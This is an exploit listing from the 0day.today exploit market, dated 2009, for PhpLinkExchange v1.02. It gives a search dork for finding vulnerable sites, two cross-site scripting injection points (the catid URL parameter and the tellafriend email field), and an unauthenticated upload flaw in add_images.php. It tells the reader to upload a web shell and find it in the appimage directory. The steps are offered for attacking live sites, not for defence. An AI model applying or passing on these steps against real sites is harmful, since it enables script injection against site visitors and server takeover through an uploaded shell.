[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PhpLinkExchange v1.02 - XSS/Upload Vulerability

Author
Stink
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10277
Category
web applications
Date add
16-12-2009
Platform
unsorted
===============================================
PhpLinkExchange v1.02 - XSS/Upload Vulerability
===============================================

#############################
PhpLinkExchange v1.02 - XSS/Upload Vulerability
Discovered by : Stink'
Date : 2009-12-16
Dork : "PhpLinkExchange v1.02"
Website Publisher : http://www.idevspot.com/PhpLinkExchange.php
#############################
 
-- [XSS in URL] --
http://server/links/PhpLinkExchange/index.php?page=home&catid=[XSS]
 
-- [XSS in form] --
http://server/links/PhpLinkExchange/index.php?page=tellafriend
The XSS is in "Your Email Adress"
 
-- [Upload Vulnerability] --
http://server/links/library/add_images.php
After your shell uploaded, go here :
http://server/links/appimage/ and search your shell :)



#  0day.today [2024-07-16]  #